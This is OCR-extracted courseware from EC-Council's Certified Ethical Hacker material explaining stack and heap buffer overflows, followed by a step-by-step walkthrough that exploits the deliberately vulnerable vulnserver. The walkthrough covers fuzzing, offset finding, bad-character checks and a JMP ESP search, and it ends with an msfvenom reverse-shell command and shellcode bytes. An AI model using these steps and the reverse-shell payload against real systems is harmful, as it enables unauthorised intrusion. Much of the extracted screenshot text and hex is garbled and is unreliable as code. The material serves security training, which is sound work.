ESP: Extended Stack Pointer (ESP) stores the address of the next data element to be stored onto the stack

o

EIP: Extended Instruction Pointer (EIP) stores the address of the next instruction to

o

ESI:

be executed

Extended

Source

Index

(ESI)

maintains

the

source

index

for various

string

operations

o

EDI: Extended Destination Index (EDI) maintains the destination index for various string operations

A stack-based buffer overflow occurs when an application writes more data to a buffer than what is actually allocated for that buffer. To understand stack-based buffer overflow, you must focus on the EBP, EIP, and ESP registers. EIP is the most important read-only register, which stores the address of the instruction that needs to be subsequently executed. ESP (Extended Stack Pointer) > Stack Frame

Buffer Space

EBP (Extended Base Pointer) EIP (Extended Instruction Pointer) > Return Address Figure 6.42: Representation of stack

Whenever a function starts execution, a stack frame that stores its information is pushed onto the stack and stored in the ESP register. When the function returns, the stack frame is popped out from the stack and the execution resumes from the return address stored on the EIP register. Hence, if an application or program is vulnerable to buffer overflow attack, then attackers take control of the EIP register to replace the

Module 06 Page 659

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

return address of the function with malicious code that allows them to gain shell access to the target system. Bottom of Stack

Bottom of Stack

Bottom of Stack

Data on Stack Segment

Data on Stack Segment

Data on Stack Segment

SP-->

End of Stack

4 Bytes

Return Address

4Bytes

n Bytes

More Data on

nBytes+

sP-> ANormal Stack

new data

Stack Segment End of Stack

SP-->

Stack when Attacker calls a function

Some gata owerwaitten

New Return Address

— Overwritten Data

on Stack Segment

Malicious Code.

bee Fa nysh)

End of Stack Stack when attacker

overflows buffer in function to smash the stack

Figure 6.43: Demonstration of stack-based buffer overflow

=

Heap-Based Buffer Overflow

A heap is used for dynamic memory allocation. Heap memory is dynamically allocated at run time during the execution of the program, and it stores the program data. Accessing heap memory is slower than accessing stack memory. The allocation and deallocation of heap memory is not performed automatically. Programmers must write code for the allocation [malloc()] of heap memory, and after the execution is complete, they must deallocate the memory using functions such as free(). Heap-based overflow occurs when a block of memory is allocated to a heap and data is written without any bound checking. This vulnerability leads to overwriting links to dynamic memory allocation (dynamic object pointers), heap headers, heap-based data, virtual function tables, etc. Attackers exploit heap-based buffer overflow to take control of the program’s execution. Buffer overflows commonly occur in the heap memory space, and exploitation of these bugs is different from that of stack-based buffer overflows. Heap overflows have been prominently discovered as software security bugs. Unlike stack overflows, heap overflows are inconsistent and have varying exploitation techniques. } input=malloc(20);

} output=malloc(20);

} input=malloc(20);

£ output=malloc(20);

Heap: After Overflow Figure 6.44: Demonstration of heap-based buffer overflow

Module 06 Page 660

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Simple Buffer Overflow in C

CEH

Example of Stack-Based Overflow

Example of Heap-Based Overflow

Simple Buffer Overflow in C The examples overflow:

shown

in the

screenshots

demonstrate

stack-based

and

heap-based

buffer

Stack_BufferOverflow.c

int

er(char char bu trcpy(buff,

return int

n(int

C v Tab Width:

4 v

Figure 6.45: Screenshot of C program demonstrating stack-based buffer overflow Module 06 Page 661

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

ar

Termina attacke

$gcc attack

Stack

egmentation

rr

BufferOverfl rrot Desk

fault

print printf ( printf

Cv

Tab Width:

4 v

Ln 14, Col2

Figure 6.47: Screenshot of C program demonstrating heap-based buffer overflow

rch

attacker@parrot $gcc Heap Overflow.c attacker@parrot i $./a.out AAAAAAAAAAAAAAAAAAAAAAAAAABPAAAAAAAAABA |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Figure 6.48: Screenshot showing the output of heap-based buffer overflow

Module 06 Page 662

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Windows Buffer Overflow Exploitation

CE H

fen]

Identify bad characters

~3]

Steps involved in exploiting Windows based buffer overflow vulnerability:

B

Perform spiking

Bs

Perform fuzzing

Identify the right module

R

centity the offset

Generate shellcode

Overwrite the EIP register

Gain root access

Copyright © by

Windows Buffer Overflow Exploitation (Cont’d)

iy Prohibited.

CE H

Perform Spiking | spiking allows attackers to send crafted TCP or UDP packets to the vulnerable server in order to make it crash @ Spiking helps attackers to identify buffer overflow vulnerabilities in the target applications © Step 1: Establish a connection with the vulnerable server using Netcat

© Step 2: Generate spike templates and perform spiking

Copyright © by

Module 06 Page 663

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Windows Buffer Overflow Exploitation (Cont’d)

CE H

AX, ESP, EBP, EIPregistersare ‘overaritten with ASC value “A”

Immunty Debuggershowing ‘wnerable server paused dueto ‘access violation

iy Prohibited.

Windows Buffer Overflow Exploitation (Cont’d)

CEH

Perform Fuzzing @

Attackers use fuzzing to send a large amount of data to the target server so that it experiences

buffer overflow and overwrites the EIP register ‘@

Fuzzing helps in identifying the number of bytes

‘@

This information helps in determining the exact location of the EIP register, which further helps

required to crash the target server

in injecting malicious shellcode

[@=) |

Module 06 Page 664

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Windows Buffer Overflow Exploitation (Cont’d)

CE H

Copyright © by EC-Councl Al Rights Reserved Reproduction i Strictly Prohibited.

Windows Buffer Overflow Exploitation (Cont’d)

CE H

Identify the Offset

@ Attackers use the Metasploit framework pattern_create and pattern_offset ruby tools to identify the offset and exact location where the EIP register is being overwritten

Copyright © by EC-Councl. Al RightsReserved. Reproduction is St

Module 06 Page 665

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Windows Buffer Overflow Exploitation (Cont’d)

CE H

TTL Ea TTR NES

overwritten EP register with randombytes

Ss WHAT Wa oHSGHE Lng” CSHCES971 =u SHIFEVP7 774797 Ga pan OHA Copyright © by

iy Prohibited.

CEH

Windows Buffer Overflow Exploitation (Cont’d) Overwrite the EIP Register

@ Overwriting the EIP register allows attackers to identify whether the EIP register can be controlled and can be overwritten with malicious shellcode

001011) 101110

Copyright © by

Module 06 Page 666

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Windows

Exam 312-50 Certified Ethical Hacker

Buffer Overflow Exploitation (Cont’d) emtwhcPkber

Observe the IP register ‘overwritten with fourD (asc value: 44)

Copyright © by

Windows

Al Rights Reserved. Reproduction i Strity Prohibited.

Buffer Overflow Exploitation (Cont’d)

CEH

Identify Bad Characters

@ Before injecting the shellcode into the EIP register, attackers identify bad characters that may cause issues in the shellcode @

nies

a

ae

You can obtain the badchars

through a Google search. Characters such as no byte, ie., “\x00”, are badchars

Module 06 Page 667

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Windows Buffer Overflow Exploitation (Cont’d)

CEH

Identify the Right Module ca

@ In this step, attackers

identify the right module of the vulnerable server

Il Opens_Wndor Hp

a lemtwiePE ber

that

@ In Immunity Debugger, you can use scripts such as to identify modules that lack memory protection

Theres nomenory rotation

Windows Buffer Overflow Exploitation (Cont'd) Jt)

x 9)

ME

CEH

A lemewhePkbzr

‘winerablemodule Hex codefor JMPESP command Imone finds eixet™ ms esstune

Module 06 Page 668

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Windows Buffer Overflow Exploitation (Cont’d) 4 ety Debug ene [CPU OTM AXON Wl

CE H

ce ete Lemtwh oPR ber

(W244) ResaleRE AE wEaFane-C2SWESA

aaa Copyright © by EC-Counell Al Rights Reserved Reproduction i Strictly Prohibited.

Windows Buffer Overflow Exploitation (Cont’d)

CE H

Generate Shellcode and Gain Shell Access

@ Attackers use the msfvenom command to generate the shellcode and inject it into the EIP register to gain shell access to the target vulnerable server

\xS1 x61\xb2\349\47 1 x60 X16 Copyright © by EC-Councl. Al RightsReserved. Reproduction is St

Windows Buffer Overflow Exploitation Exploiting Windows-based buffer overflow vulnerability involves the following steps: =

Perform spiking

=

Perform fuzzing

=

Identify the offset

Module 06 Page 669

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

=

Overwrite the EIP register

=

Identify bad characters

=

Identify the right module

=

Generate shellcode

=

Gain root access

Before executing the following steps, you must install and run a vulnerable server on the victim’s machine, then run Immunity Debugger, and finally attach the vulnerable server to the debugger. Perform Spiking Spiking allows attackers to send crafted TCP or UDP packets to the vulnerable server to make it crash. It helps attackers to identify buffer overflow vulnerabilities in the target applications. The following steps are involved in spiking: =

Step - 1: Establish a connection with the vulnerable server using Netcat As shown in the screenshot below, you can use the following Netcat command to establish a connection with the target vulnerable server and identify the services or functions provided by the server. ne

-nv



Figure 6.49: Screenshot of Netcat Module 06 Page 670

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

Step - 2: Generate spike templates and perform spiking Spike templates define the package formats used for communicating with the vulnerable server. They are useful for testing and identifying functions vulnerable to buffer overflow exploitation. Use the following spike template for spiking on the STATS function:

Text »_Tab Width: 4 v Figure 6.50: Screenshot showing STATS spike template

Now, send the packages to the vulnerable server using the following command: generic_send_tcp



spike_script

SKIPVAR

SKIPSTR

n

send tcp 10,10,1,11 9999 stats. spk @

jumber of Strings is 681

able 0:0 ‘ad=Welcome to Vulnerable Server! Enter HELP for hi ariable 0:1 to Vulnerable Server! Enter HELP for help

ng iable ng ble ‘ome to Vulnerable Server! Enter HELP for help 45

Figure 6.51: Screenshot showing the output of spiking vulnerable server

Module 06 Page 671

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

-

module ntail] - [CPU - thread 0000TEFO, & Immunity Debugger - vulnserver.exe

TBI Ee View Debug Plugins Sw

«x >|

Immlib Options Window Help Jobs Jol

x

o

lemtwh?ePkbz1 = .s

x

|

fo PTR Oss CEDI+2EC2

Immunity Debugger showing running status of vulnerable server New thread with ID 09000918 created

Running

Figure 6.52: Screenshot of Immunity Debugger As we have identified that the STATS function is not vulnerable to buffer overflow, we repeat the same process for the TRUN function. Use the following spike template for spiking on the TRUN function:

HO B trunspk x

PlainText v_Tab Width: 4 v

Ln3, Col 24

Figure 6.53: Screenshot showing TRUN spike template

Module 06 Page 672

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Now, send the packages to the vulnerable server using the following command: generic_send_tcp



spike_script

SKIPVAR

SKIPSTR

ee

File

tc

Edit

ch

Terminal

9

1.spk

0 0 - Parr

Help

line read=Welcome to Vulnerable Fuzzing Variable 0:1301 Ac

0.1.1

Server!

Enter

HELP

for

help

for

help

7

]-[

#pluma

@parrot

trun.spk

Gparrot Total

jeneric

Number

Fuzzing

send

of

tcp

Strings

Fuzzing

Variable

0:0

Fuzzing

Variable

0:1

line read=We e Variables 0 Fuzzing Variable 0

Variable

is

681

to Vulnerable

9999

Server!

trun.spk

Enter

0

HELP

6

5

Fuzzing Variable Variables 21

Fuzzing Variable ‘iablesize= 3

0:

Fuzzing

Variable

0

Variable

0

Fuzzing Variable Variables 45 Fuzzing Variable

0 0:

Fuzzing

0:

Fuzzing Variable \Variablesize: \Variab Fuzzing

10.10.1.11

\Variablesize=

©

49

Variable

Figure 6.54: Screenshot showing the output of spiking vulnerable server As shown in the screenshot, the TRUN function of the vulnerable server has buffer overflow vulnerability. Spiking this function overwrites stack registers such as EAX, ESP, EBP, and EIP. If attackers can overwrite the EIP register, they can gain shell access to the

target system.

Module 06 Page 673

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

& immunity Debugger -vulnzerverexe- [CPU thread 0 02C7C] Getic Debug Plugins Immlib Options Window Help Jobs Wael lemtwhePkbzr

o

x

EAX, ESP, EBP, EIP registers are overwritten with ASCII value “A”

Immunity Debugger showing vulnerable server paused due to access violation

TOSTAVTAUY Weceas_oLoTat Ton when executing TAUTAaLT — use ShFETPIZPU7EY Eo pass exception to progran

Figure 6.55: Screenshot of Immunity Debugger showing buffer overflow vulnerability Perform Fuzzing After identifying the buffer overflow vulnerability in the target server, we must perform fuzzing. Attackers use fuzzing to send a large amount of data to the target server so that it experiences buffer overflow and overwrites the EIP register. Fuzzing helps in identifying the number of bytes required to crash the target server. This information helps in determining the exact location of the EIP register, which further helps in injecting malicious shellcode. For example, the perform fuzzing:

screenshot

below

shows

the

sample

Python

script used

by attackers

to

Figure 6.56: Screenshot showing Python script for fuzzing Module 06 Page 674

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

When you execute the above code, buff multiplies for every iteration of the while loop and sends the buff data to the vulnerable server. As shown in the screenshots, the vulnerable server crashed after receiving approximately 2300 bytes of data, but it did not overwrite the EIP register. #cd

parrot

/home/attacker/Desktop/Scripts

@parrot

#chmod

+x

fu:

Figure 6.57: Screenshot showing the output of fuzzing vulnerable server & Immunity Debugger vulnserver.exe- [CPU - thread 00000844, module vulnser] 14g Blugins Immbib

jecess violation when reading”

Se

o

=

Yo pass exception to program

x

rans

Figure 6.58: Screenshot of Immunity Debugger showing vulnerable server after the buffer overflow Identify the Offset Through fuzzing, we have understood that we can overwrite the EIP register with 1 to 2300 bytes of data. Now, we will use the following pattern_create Ruby tool to generate random bytes of data: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 3000

Module 06 Page 675

-1

Ethical Hacking and Countermeasures Copyright © by E€-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

attacker@parrot sword for

attacker

arrot

ern create. rb 1 119 Jsploit-franework/tools/exploit ‘Aaa Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbOAb1Ab2Ab3Ab4ADSADGAb7ADBADSACOACIACZAC3ACAACSACGACTACBACSAGQAIAdZAd BAd4Ad5Ad6Ad7AdBAd9AeOAc 1Ae2Ae3Ae4AeSAcGAe7ABACIATOAT LAFZAFSAT4ATSAF OAT TAF BAT IAGOAGIAGZAg3AG4Ag5AgOA

-Q7Ag8Ag9AhOAh LAh2Ah3AN4ANSANGAh7AHBANIAIOAI 1Ai2Ai 3A 4A 5A 6A 7A18A1 9A j OAj 1Aj 2A] 3Aj 4A} 5Aj 6Aj 7A} 8A} 9AKO AKIAK2AK3AK4AKSAK6AK7AKBAK9A LOAL1AL2ZAL3AL4ALSALOALTALBALSAMOAM1AMZAMZAM4AMSAMGAM7 AMBAMSANOAN1AN2ZAN3AN

4An5An6An7ANBAN9AGGAO1A02A03A04A05A06A07A0BAO9APOAp1Ap2Ap3Ap4ApSAp6Ap7ApSAp9AqOAq1AqZAq3Aq4AqSAq6Aq7A

g8Aq9ArOAr1Ar2Ar3ArdArSArGAr7ArBArSASOAS 1AS2AS3AS4ASSASOAS7ASBASOACOAtIAtZAt3AtGAtSAtGAt 7AtBAt 9AUGAUI| ‘AU2AU3AU4AUSAUGAU7AUBAUIAVOAV IAV2AVAVSAVSAVGAVTAVBAVDAWOAWLAW2AW3AW4AWSAWOAW/AWBAW9AXOAKIAX2AX3AX4A SAX6AX7AXBAX9AyOAy1AY2Ay3Ay4AySAYOAY 7Aas ;Az4A25A26A27AZ8A29Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7 Bas .a9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7BbEBbIBCOBc Hy. a 7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd58d6Bd7BdSBd9BeoBe 1Be: Be3BedBeSBe6Be7Be8Be9B0Bf 1Bf2Bf3B 4B eee Bg 1Bg2B938948958968q7B988q9Bh0Bh1Bh2Bh3Bh4Bh5B! ‘(68h7Bh8Bh9Bi 0B: 1Bi 2Bi3Bi4Bi5Bi6Bi7Bisy 1B} 5B 6B j 78] 8B j 9BkOBk1Bk2Bk3Bk4Bk5BKOBk7BKSBK9H ‘10B11812B13814B15816B17B18B19Bn0Bn1BM dow 188n9BNOBn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9B09B01B02Bo Bo4B05B06B07B08609Bp0Bp1Bp2Bp3Bp4Bp5B| 28q3Bq48q58q68q7Bq88q98rOBr 1Br2Br3Br4BrSBroBr 7Br8Br9Bs0Bs1B52Bs3Bs4B55B68s7Bs8Bs9 t6Bt7Bt8Bt 9Bu0Bu1 Bu2Bu3Bu4BuSBu6Bu7Bus6u9B VOB \v1Bv2Bv3Bv4Bv5Bv6Bv7BV8BV9BWOBW1BW2Bw: 9Bx@Bx1Bx2Bx3Bx4BXx5BX6BXx7Bx8Bx9ByOBy 1By2By3By4 E a3CadCa5Ca6Ca7CaBCa9CbOCb1Cb2Cb3Cb4cb5Cb6Cb7Cb ‘BCb9CCOCCICC2Cc3Cc4Ce5CcOCC7CcBCcICdOG bcd 7Cd8Cd9CedCelCe2Ce3CedCeSCebCe7CeBCe9CfOCf F2CF3C FAC F5CF6CF7CF8CF9Cg9Cq1C92C93C oa OCh1Ch2Ch3Ch4Ch5Ch6Ch7ChBCh9CiOCi1Ci2Ci 3CiACi (CLOCAU7CABCA9CjOCj1Cj2C} 3Cj 4Cj5Cj6Cj 7 TI K4CKSCKOCK7CkBCk9CLOCLICL2CL3CLACLSCLECL7CLECY ‘9CmOCm1Cm2Cm3Cm4Cm5Cm6Cm7CmBCm9CNOCn1Ch ACnocnocn/Cn8Cn9Co@CO1C02Co3Co4CoSCobCO7CoBCOICpACp1Cp2 p3Cp4Cp5Cp6Cp7Cp8Cp9CqaCq1CqaCq3Cq4Cq5Cq6Cq7CqaCq9CrOCr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9CsOCs1Cs2Cs3Cs4Cs5CsG Cs7CSBCs9CtOCtICtZCt3Ct4ctSCtOCt7CtECt 9CueCulCu2Cu3Cu4CuSCu6CUTCUBCUICVOCVICv2Cv3CV4CVSCv6CV7CVBCV9C ‘@Cw1Gw2Cw3Cw4 Cw5Cw6CW7CwBCW9CXOCKICX2CX3CXACXS Cx6CX7CXBCXICVOCY1Cy2Cy3CvaCySCy6Cy7CyBCy9Cz0Cz1C72¢23C Figure 6.59: Screenshot showing Metasploit pattern_create output

Run the following Python script to send these random bytes to the vulnerable server:

Figure 6.60: Screenshot of Python script sending random bytes to the server

Module 06 Page 676

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

When the above script server, which causes a register is overwritten find the offset of those & Immunity Debugger - vulnserv View Debug Plugins

is executed, random bytes of data are sent to the target vulnerable buffer overflow in the stack. The screenshot clearly shows that the EIP with random bytes. You must note down the random bytes in EIP and bytes. [CPU - threa 4] |mmlib Options Window Help Jobs fael lemtwhcPkbzr..

Buffer Overflow of Vulnerable Server has overwritten EIP register with random bytes

[06:25:54] Access violation when executing (386F4337] — use Shift*F7/F8/F9 to pass exception to progran

Figure 6.61: Screenshot of Immunity Debugger showing vulnerable server after the buffer overflow Run the following command to find the exact offset of the random bytes in the EIP register: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 3000 -q 386F4337

-1

Figure 6.62: Screenshot showing Metasploit pattern_offset output

Module 06 Page 677

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

Overwrite the EIP Register As shown in the screenshot, we have identified that the EIP register is at an offset of 2003 bytes. Now, run the following Python script to check whether we can control the EIP register.

Figure 6.63: Screenshot of Python script injecting shellcode in the EIP register As shown in the screenshot, the EIP register can be controlled and overwritten with malicious shellcode. Help

Jobs

-

BEI

0

x

C208 ects and sofware assessment specialist needed

Observe the EIP registeris overwritten with four D’s (ascii value: 44)

r 1062362501 fecess Violation when executing (444444441) use ShiFE+F77PO/F9 to pass exception to progran

Figure 6.64: Screenshot of Immunity Debugger showing EIP register Module 06 Page 678

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Identify Bad Characters Before injecting the shellcode into the EIP register, you must first identify bad characters that may cause issues in the shellcode. You can obtain the badchars through a Google search. Characters such as no byte, i.e., “\x00”,

are badchars.

badchars

q"

\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f£\x10\x11\x1

=

2\x13\x14\x15\x16\x17\x18\x19\x1la\x1b\x1c\x1d\xle\x1f£"

"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32 \x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3£\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4£\x50\x51\x52\x53 \x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5£"

"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72 \x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7£"

"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92 \x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9F" "\xa0\xal\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2 \xb3\xb4\xb5\xb6\xb7

\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"

"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2 \xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"

"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8

\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2

\x£3\xf4\x£5\xf£6\xf£7\x£8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

Next, run the following Python script to send badchars along with the shellcode:

Figure 6.65: Screenshot of Python script for sending badchars Module 06 Page 679

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

In Immunity Debugger, right-click on the ESP register value, then click on “Follow in Dump,” and finally observe the characters. You will find that there are no badchars that create problems in the shellcode. & Immunity Debugger -vulnserver.exe- [CPU - thread 00001D1C} El File View Debug Plugins Immlib Options Window Help Jobs x

DBE

Wor

lemtwhcPkbzr

[06:41:34] Access violation when executing [44444444] — use Shift*F7/F8/F9 to pass exception to progran

Figure 6.66: Screenshot of Immunity Debugger showing ESP dump Identify the Right Module In this step, we must identify the right module of the vulnerable protection. In Immunity Debugger, you can use scripts such as modules. You must download mona.py from GitHub and copy Debugger > PyCommands. Now, run the vulnerable server and Administrator, and attach the vulnerable server to the debugger.

server that lacks memory mona.py to identify such it to the path Immunity the Immunity Debugger as

In Immunity Debugger, type !mona modules in the bar at the bottom of the window. As shown in the screenshot, a pop-up window is created, which shows the protection settings of various modules.

Module 06 Page 680

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

& Immunity Debugger -vulnserver.eve- [Log data] B) File View Debug Plugins Immlib Options Window Help Jobs OPS

lemtwhePk

Ax OMAHA

M

bar.

Thereis no memory protection for the module essfunc.dll

Running

Figure 6.67: Screenshot of Immunity Debugger showing mona modules As shown in the screenshot, one of the modules, essfunc.dll, lacks memory protection. Attackers exploit such modules to inject shellcode and take full control of the EIP register. Now, run the following nasm_she11 Ruby script to convert assembly language (JMP ESP) into hex code: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb

attacker@parrot S

$sudo

assword

aah

hades

for

ie py

attacker: lamar

Hex code for JMP ESP command

@parrot #7usr/share/m

S

~

amework/tools/exploit/nasm

> JMP_ESP (elelelolelololomm F FES

In

jmp

>

shell.

rb

esp

Figure 6.68: Screenshot showing Metasploit nasm_shell output Next, in Immunity Debugger, type the following command in the bar at the bottom window to determine the return address of the vulnerable module: 'mona

find

Module 06 Page 681

-s

“\xff\xe4”

-m

of the

essfunc.dll Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

& irnmunty Debugger-vulneereree [Log data] 9 Plugins _Immlib Options xd

HaHa

a

Window Help Jobs

2

emtwhcePkbzr.

Return address of the vulnerable module

Figure 6.69: Screenshot of Immunity Debugger showing return address of a vulnerable module In Immunity Debugger, select “Enter expression to follow’, enter the identified return address in the text box, click “ok”, and press “F2” to set up a breakpoint at that particular address. ao

Immunity Debugger -vunserverexe- [CPU main thread, moduleess 1

GJ file View Debug

ot

«xr

Bh

Immtib

Opti

UHRA

Go to address in Disassenblor

Help Jobs

LemtwhePkbzriws

x

2?

Paused

Figure 6.70: Screenshot of Immunity Debugger showing breakpoint at the return address Module 06 Page 682

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Now, inject the identified return address into EIP by running the following script: For example, if the return address is “625011a£”, then you must send “\xaf\x11\x50\x62”,

as the x86 architecture stores values in the Little Endian format.

Figure 6.71: Screenshot of Python script for overwriting EIP When you run the above script, you will notice that the EIP register has been overwritten with the return address of the vulnerable module: View Debug Plugins

_Immkib

8, module efune Window Help Jobs

(07:22:44 Breakpoint at esefunc.6256i10F

Figure 6.72: Screenshot of Immunity Debugger showing EIP register As shown in the screenshot, attackers can control the EIP register if the target server modules that do not have proper memory protection settings.

Module 06 Page 683

has

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Generate Shellcode and Gain Shell Access Now, run the following msfvenom command to generate the shellcode: msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread -f c -a x86 -b “\x00”

LHOST=

LPORT=

In the above command, -p > payload, LHOST > attacker’s IP, LPORT > attacker’s port, -f > filetype, -a > architecture, and —-b > bad characters

" \xedb\ xd F\ xbb\x93\x9b\x2a\xd9\xd9\ x74 \x24\ xF4\x58\x2b\xc9\xb1" \x52\x83\xcO\x04\ x31 \ x58) x13\ x03 \xcb\x88\xc8\x2c\x17\x46\xBe "\xcf\xe7\x97\xe f\x46\x02\ xa6\ x2F\ x3c\x47\x99\x9f\x36\x05\ x16" "\x6b\ x1a\xbd\xad\x19\xb3\ xb2\ x06\ x97\xe5\xfd\x97\x84\xd6\ x3c \x1b\xd7\x@a\x7e\ x25\ x18\ x5 \ x7 \x62\x45\x92\ x2d\ x3b\ x01\ x81 \XC1\x48\ x5 \xa\ x6a\ x02\ x71\x9a\ x8 \xd3\x70\ x8b\x1e\ x6f\ 2b" \\ xb \xal\xbc\x47\x02\ xb9\ xa)\x62\xdc\x32\x11\x18\ xdf\x92\ x6! *\xe1\x4c\ xdb \x43\x10\xBc\x1.c\ x63\ xcb\xfb\x54\x97\x76\xfc\xa3"

\ x5 xA10\x89\ x37 \x4d\x26\x29\ *\x3e\ x60\x57\x6f\x35\x9C\ xf "\ xd\ x64 \xd8\xd3)\xe9\x76\x "\x2d\ xcc\xSe\xb7\x39\x47\x "\xc9\x45\x9a)\xd0 \x3:4\ x66 \ "\x61\xdb\xee\XC7\x31\x73\ x

x93 \x6 f \xeb\ spenTerminat ! ia xf PIED aa

ts "\x70\x14\x16\x97\xib\xef\x|

xac\x50\x63\ x40 \ xb: RENE NEL Be\ xd8\xfd\x5c\x27 p9\ xa5\x6f\xda\x3e" \x91\xd3\x3.a\x40 1\ x49 xeb \xbb\ x6

———_Bc\x5b\xed\xfo\x1f"

